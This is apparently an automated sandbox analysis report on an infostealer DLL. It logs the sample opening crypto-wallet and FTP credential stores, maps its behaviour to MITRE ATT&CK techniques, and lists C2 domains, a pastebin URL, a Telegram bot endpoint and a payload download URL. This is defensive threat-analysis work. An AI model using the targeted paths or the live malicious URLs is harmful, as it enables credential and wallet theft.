                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 8084, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 8084, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts2
                      Windows Management Instrumentation
                      1
                      Scripting
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      2
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      311
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory1
                      File and Directory Discovery
                      Remote Desktop Protocol41
                      Data from Local System
                      11
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts3
                      PowerShell
                      Logon Script (Windows)Logon Script (Windows)41
                      Obfuscated Files or Information
                      Security Account Manager33
                      System Information Discovery
                      SMB/Windows Admin Shares2
                      Clipboard Data
                      21
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                      Software Packing
                      NTDS351
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Process Discovery
                      SSHKeylogging124
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Masquerading
                      Cached Domain Credentials141
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                      Process Injection
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Rundll32
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561436 Sample: SystemCoreHelper.dll Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 78 pastebin.com 2->78 80 api.telegram.org 2->80 82 3 other IPs or domains 2->82 96 Suricata IDS alerts for network traffic 2->96 98 Found malware configuration 2->98 100 Antivirus detection for URL or domain 2->100 106 16 other signatures 2->106 9 loaddll32.exe 1 2->9         started        signatures3 102 Connects to a pastebin service (likely for C&C) 78->102 104 Uses the Telegram API (likely for C&C communication) 80->104 process4 process5 11 rundll32.exe 7 9->11         started        15 rundll32.exe 8 9->15         started        17 cmd.exe 1 9->17         started        19 conhost.exe 9->19         started        file6 72 C:\Users\user\AppData\...\1ixib5wl.cmdline, Unicode 11->72 dropped 74 C:\Users\user\AppData\Local\...\1ixib5wl.0.cs, Unicode 11->74 dropped 130 Suspicious powershell command line found 11->130 132 Tries to download and execute files (via powershell) 11->132 134 Bypasses PowerShell execution policy 11->134 21 zbjnkzvo4cc.exe 11->21         started        25 powershell.exe 23 11->25         started        27 powershell.exe 15 16 11->27         started        38 4 other processes 11->38 76 C:\Users\user\AppData\Local\...\juqgin2j.0.cs, Unicode 15->76 dropped 136 Adds a directory exclusion to Windows Defender 15->136 30 mxtvcgq32fe.exe 15->30         started        32 powershell.exe 15->32         started        34 csc.exe 3 15->34         started        40 4 other processes 15->40 36 rundll32.exe 17->36         started        signatures7 process8 dnsIp9 62 C:\Users\user\AppData\Roaming\gdi32.dll, PE32 21->62 dropped 108 Multi AV Scanner detection for dropped file 21->108 110 Machine Learning detection for dropped file 21->110 112 Writes to foreign memory regions 21->112 120 2 other signatures 21->120 42 aspnet_regiis.exe 21->42         started        52 2 other processes 21->52 114 Found many strings related to Crypto-Wallets (likely being stolen) 25->114 116 Loading BitLocker PowerShell Module 25->116 118 Powershell drops PE file 25->118 46 conhost.exe 25->46         started        88 192.81.132.76, 49734, 49735, 80 LINODE-APLinodeLLCUS United States 27->88 90 pastebin.com 104.20.3.235, 443, 49730, 49731 CLOUDFLARENETUS United States 27->90 64 C:\Windows\Temp\zbjnkzvo4cc.exe, PE32 27->64 dropped 48 conhost.exe 27->48         started        54 2 other processes 30->54 50 conhost.exe 32->50         started        66 C:\Users\user\AppData\Local\...\juqgin2j.dll, PE32 34->66 dropped 56 2 other processes 34->56 68 C:\Users\user\AppData\Local\...\1ixib5wl.dll, PE32 38->68 dropped 58 5 other processes 38->58 92 api.telegram.org 149.154.167.220, 443, 49808, 49814 TELEGRAMRU United Kingdom 40->92 94 ipinfo.io 34.117.59.81, 443, 49762, 49764 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 40->94 70 C:\Windows\Temp\mxtvcgq32fe.exe, PE32 40->70 dropped 60 4 other processes 40->60 file10 signatures11 process12 dnsIp13 84 frogs-severz.sbs 104.21.88.250, 443, 49744, 49747 CLOUDFLARENETUS United States 42->84 86 revirepart.biz 172.67.184.174, 443, 49741 CLOUDFLARENETUS United States 42->86 122 Query firmware table information (likely to detect VMs) 42->122 124 Found many strings related to Crypto-Wallets (likely being stolen) 42->124 126 Tries to harvest and steal ftp login credentials 42->126 128 2 other signatures 42->128 signatures14

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      SystemCoreHelper.dll18%ReversingLabsWin32.Trojan.Generic
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
                      C:\Windows\Temp\zbjnkzvo4cc.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll100%Joe Sandbox ML
                      C:\Windows\Temp\mxtvcgq32fe.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll100%Joe Sandbox ML
                      C:\Windows\Temp\mxtvcgq32fe.exe26%ReversingLabsWin32.Infostealer.Generic
                      C:\Windows\Temp\zbjnkzvo4cc.exe26%ReversingLabsWin32.Infostealer.Generic
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://frogs-severz.sbs/apibubM0%Avira URL Cloudsafe
                      https://frogs-severz.sbs/api0%Avira URL Cloudsafe
                      http://crl.micro/0%Avira URL Cloudsafe
                      https://frogs-severz.sbs/((0%Avira URL Cloudsafe
                      https://revirepart.biz/100%Avira URL Cloudmalware
                      http://www.microsoft.co10%Avira URL Cloudsafe
                      https://frogs-severz.sbs/90%Avira URL Cloudsafe
                      http://192.81.132.76/b.exe0%Avira URL Cloudsafe
                      https://frogs-severz.sbs/api7M0%Avira URL Cloudsafe
                      https://frogs-severz.sbs/apis0%Avira URL Cloudsafe
                      https://frogs-severz.sbs/apiV0%Avira URL Cloudsafe
                      http://192.81.132.760%Avira URL Cloudsafe
                      https://frogs-severz.sbs/0%Avira URL Cloudsafe
                      http://www.microsoft.cou0%Avira URL Cloudsafe
                      https://frogs-severz.sbs:443/api0%Avira URL Cloudsafe
                      https://ipinfo.i0%Avira URL Cloudsafe
                      https://frogs-severz.sbs/s0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ipinfo.io
                      34.117.59.81
                      truefalse
                        high
                        frogs-severz.sbs
                        104.21.88.250
                        truetrue
                          unknown
                          revirepart.biz
                          172.67.184.174
                          truefalse
                            high
                            api.telegram.org
                            149.154.167.220
                            truefalse
                              high
                              pastebin.com
                              104.20.3.235
                              truefalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://frogs-severz.sbs/apitrue
                                • Avira URL Cloud: safe
                                unknown
                                https://revirepart.biz/apifalse
                                  high
                                  http://192.81.132.76/b.exetrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ipinfo.io/countryfalse
                                    high
                                    revirepart.bizfalse
                                      high
                                      https://pastebin.com/raw/NQfY14gmfalse
                                        high
                                        https://ipinfo.io/ipfalse
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://frogs-severz.sbs/api7Maspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/botrundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2604425013.0000000007490000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 0000000B.00000002.1743928726.00000000056B1000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1743019930.0000000007391000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1742462510.00000000056B0000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000B.00000003.1742259458.00000000056AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://go.microsoft.copowershell.exe, 00000022.00000002.2296676818.00000000079F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://revirepart.biz/aspnet_regiis.exe, 0000001A.00000003.1953259118.0000000002926000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://contoso.com/Licensepowershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 0000001A.00000003.2023316255.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023048745.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D82000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://frogs-severz.sbs/apibubMaspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crl.micro/powershell.exe, 00000028.00000002.2456306228.0000000007881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://pastebin.com/raw/nqfy14gmpowershell.exe, 00000013.00000002.1895365190.0000000000860000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://pastebin.com/rawNQfY14gmpowershell.exe, 00000011.00000002.1885257880.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1930333354.0000000006BBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ipinfo.io/iphZ_lpowershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000056B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://frogs-severz.sbs/apisaspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://x1.c.lencr.org/0aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/0aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.microsoft.co1powershell.exe, 00000008.00000002.1754027788.0000000007C12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://contoso.com/powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1749981425.00000000060CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1779208319.000000000567B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1903260944.000000000607A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1924834507.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2287144047.00000000063E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2326060060.00000000065C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2411478791.0000000005894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://frogs-severz.sbs/((aspnet_regiis.exe, 0000001A.00000003.2023661770.0000000004CEE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023545300.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023355458.0000000004CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://frogs-severz.sbs/9aspnet_regiis.exe, 0000001A.00000002.2131149619.000000000290B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerundll32.exe, 00000003.00000002.2634374806.00000000048E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1745042704.0000000005061000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000004831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1749981425.00000000060CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1779208319.000000000567B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1903260944.000000000607A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1924834507.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2287144047.00000000063E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2326060060.00000000065C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2411478791.0000000005894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://192.81.132.76powershell.exe, 00000011.00000002.1887480681.0000000005472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000005232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://ipinfo.io/countryhZ_lpowershell.exe, 00000026.00000002.2353438766.0000000004986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1745042704.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1771978145.0000000004766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://frogs-severz.sbs/apiVaspnet_regiis.exe, 0000001A.00000002.2132988943.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2123496041.0000000004CF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://go.micropowershell.exe, 00000008.00000002.1745042704.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1887480681.0000000005493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1895829639.0000000004796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.0000000005906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.0000000005530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://ipinfo.iopowershell.exe, 00000022.00000002.2258625366.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000058CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.000000000532D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2375932541.00000000054F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://contoso.com/Iconpowershell.exe, 00000028.00000002.2444137718.00000000061F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.microsoft.coupowershell.exe, 00000011.00000002.1912945547.00000000077CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 0000001A.00000003.2045406634.0000000004D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 0000001A.00000003.2023316255.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2023048745.0000000004D36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001459503.0000000004D82000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2001705783.0000000004D36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.ecosia.org/newtab/aspnet_regiis.exe, 0000001A.00000003.2001033955.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2000885014.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 0000001A.00000003.2046498358.0000000004E04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000028.00000002.2375932541.00000000052E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://ipinfo.iopowershell.exe, 00000022.00000002.2258625366.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2284128442.00000000056B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2353438766.0000000005007000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://frogs-severz.sbs:443/apiaspnet_regiis.exe, 0000001A.00000003.2000438756.000000000296D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000003.2094821646.0000000004CE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 0000001A.00000002.2131149619.00000000028E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://crl.mipowershell.exe, 0000000F.00000002.1784830664.0000000007082000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
